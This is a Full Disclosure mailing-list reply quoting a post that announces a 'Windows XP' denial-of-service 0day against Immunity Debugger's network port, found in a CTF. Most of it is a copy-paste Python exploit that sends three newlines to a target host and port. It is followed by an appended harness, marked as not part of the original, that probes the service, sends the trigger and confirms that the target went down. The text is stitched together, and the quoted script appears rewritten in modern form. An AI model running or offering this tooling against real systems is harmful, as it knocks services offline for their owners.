Full Disclosure mailing list archives

Re: Windows XP denial of service 0day found in CTF exercise


From: "Justin C. Klein Keane" <justin () madirish net>
Date: Tue, 17 Apr 2012 08:26:25 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Windows XP denial of service 0day found in CTF exercise

Oof, this is almost as bad as that BackTrack 0day released the other day
(http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/).
Any response from Microsoft yet?

Justin C. Klein Keane
http://www.MadIrish.net

The PGP signature on this email can be verified using the public key at
http://www.madirish.net/gpgkey

On 04/17/2012 02:48 AM, Adam Behnke wrote:
Immunity Debugger Remote Denial of Service 0Day, tested against
versions 1.76 and 1.80 on Windows XP distributions.

Has not been tested for potential privilege escalation vectors.

We first wrote about Immunity Debugger here:
http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/

Discovered by a student who wishes to remain anonymous in the course
CTF. This 0day exploit for Windows was discovered by a student in the
InfoSec Institute Ethical Hacking class, during an evening CTF exercise.
The student wishes to remain anonymous; he has contributed a Python
version of the 0day. A patch that can be applied to Windows has not been
made available. You can find a Python version of the exploit to copy and
paste here:


#!/usr/bin/env python3
# Windows XP denial of service 0day exploit discovered on 4.9.12 by
# InfoSec Institute student.
# For full write up and description go to
# http://www.infosecinstitute.com/courses/ethical_hacking_training.html

import sys
import getopt
import socket


class Error(Exception):
    """Raised when the connect or the send to the target fails."""

    def __init__(self, error):
        self.errorStr = error

    def __str__(self):
        return repr(self.errorStr)


class Exploit():

    def __init__(self, targetHost, targetPort):
        self.targetHost = targetHost
        self.targetPort = targetPort

    def exploit(self, targetHost, targetPort):
        # The target must be a dotted-quad IPv4 address; inet_aton
        # rejects hostnames, and socket.error is OSError in Python 3.
        try:
            socket.inet_aton(targetHost)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((targetHost, targetPort))
        except socket.error:
            raise Error("Unable to exploit (Connect failed.)")

        # exploit: three bare newlines to the debugger's listening port
        try:
            s.sendall(b"\n\n\n")
        except socket.error:
            raise Error("Unable to exploit (Exploit failed.)")
        finally:
            s.close()


def usage():
    print("[!] Usage:")
    print("       ( -h, --help ):")
    print("             Print this message.")
    print("  ( --targetHost= ): Target host.")
    print("             --targetHost=127.0.0.1")
    print(" ( --targetPort= ): Target port.")
    print("                --targetPort=8888")


def main():
    print("[$] Windows XP 0Day")
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h",
                                   ["help", "targetHost=", "targetPort="])
    except getopt.GetoptError as err:
        # Print help information and exit; err reads like
        # "option -a not recognized".
        print("[!] Parameter error: " + str(err))
        usage()
        sys.exit(0)

    targetHost = None
    targetPort = None
    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit(0)
        elif opt == "--targetHost":
            targetHost = arg
        elif opt == "--targetPort":
            targetPort = arg
        else:
            # getopt only returns the options listed above, so this
            # branch should never be reached.
            print("[!] Parameter error.")
            usage()
            sys.exit(0)

    if not targetHost:
        print("[!] Parameter error: targetHost not set.")
        usage()
        sys.exit(0)

    if not targetPort:
        print("[!] Parameter error: targetPort not set.")
        usage()
        sys.exit(0)

    exploit = Exploit(targetHost, targetPort)

    print("[*] Attempting to exploit:")
    try:
        exploit.exploit(targetHost, int(targetPort))
    except Error as error:
        print("[!] Exploit Error: %s" % (error.errorStr))
        sys.exit(0)
    # The script only knows the send succeeded; it does not check
    # whether the target actually went down.
    print("[*] Exploit appears to have worked.")


# Standard boilerplate to call the main() function to begin the program.
if __name__ == '__main__':
    main()



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iPwEAQECAAYFAk+NYXEACgkQkSlsbLsN1gBiggb/efTTww5szr9rcI+NbsUzybuk
rhPyvj99VJMMVCUjHrDrWKXQeTD/rrorY3SYMIGNlHzVWgqkiswM5N16Fy9MvqIH
2Cc8aJ5kh2xi9vtlCHlPZ7XJeN3tPEL+8/qOVbT7I2CNeD8JJseVfcJwnoEyyumm
SZYmoxjJriMT7IAXysHJudaF294DvC+z6drvF+ou8wnVcIB0nkXoCVNsbcDK9dwS
R4f0a+QYN1tXM7+8za6/VznbDwcqw/amqeS3V883lqlt0XCHx5zIh+VxG0qvB5Ui
EPjoh3P/OEMP7PYRozM=
=y+j6
-----END PGP SIGNATURE-----
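The exchange the posted script performs, as an added example that is not part of the original post or of Immunity Debugger: a stub TCP listener constructed here stands in for the debugger's port-8888 service (it mimics only the reported symptom, ceasing to accept connections after receiving the three-newline trigger, and is not the debugger's code), and the sender is paired with the before/after reachability check that the posted script lacks, so "appears to have worked" becomes a verified result. Function names, the stub's behaviour and the settle delay are assumptions made for the example.

```python
"""Send-and-verify harness for the three-newline TCP trigger.

Against a real target the stub is not used: call verified_dos() with the
target host and port and it probes, sends, waits, and probes again.
"""
import socket
import threading
import time

# Payload from the posted exploit: three bare newlines.
TRIGGER = b"\n\n\n"


def is_listening(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port can be established."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def send_trigger(host, port, payload=TRIGGER, timeout=2.0):
    """Connect to host:port, send the trigger bytes, return the byte count."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
    return len(payload)


def run_stub_service(host="127.0.0.1"):
    """Start a constructed stand-in for the vulnerable listener.

    This is NOT Immunity Debugger: it accepts connections on an ephemeral
    port and, once it has received TRIGGER, closes its listening socket to
    imitate the crash. Returns (port, stopped_event).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]
    stopped = threading.Event()

    def serve():
        received = b""
        while not stopped.is_set():
            conn, _ = srv.accept()
            with conn:
                conn.settimeout(1.0)
                try:
                    received += conn.recv(1024)
                except OSError:
                    pass  # reachability probes close without sending
            if TRIGGER in received:
                srv.close()  # "crash": stop accepting connections
                stopped.set()

    threading.Thread(target=serve, daemon=True).start()
    return port, stopped


def verified_dos(host, port, stopped=None, settle=3.0):
    """Probe, send the trigger, wait, probe again.

    Returns (listening_before, listening_after); a successful DoS reads
    (True, False). `stopped` is only set when driving the local stub; a
    real target gets a fixed settle delay instead.
    """
    before = is_listening(host, port)
    if before:
        send_trigger(host, port)
        if stopped is not None:
            stopped.wait(settle)
        else:
            time.sleep(settle)
    after = is_listening(host, port)
    return before, after


def demo():
    """Run the whole exchange against the local stub."""
    port, stopped = run_stub_service()
    return verified_dos("127.0.0.1", port, stopped)


if __name__ == "__main__":
    before, after = demo()
    print("listening before: %s, after: %s" % (before, after))
```

The probe deliberately opens and closes a connection without sending anything, so it is distinguishable in the stub (and in a packet capture) from the trigger itself; against a real service a probe that is rejected before the send tells you the port was never open, which the posted script would have reported as a connect failure only.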


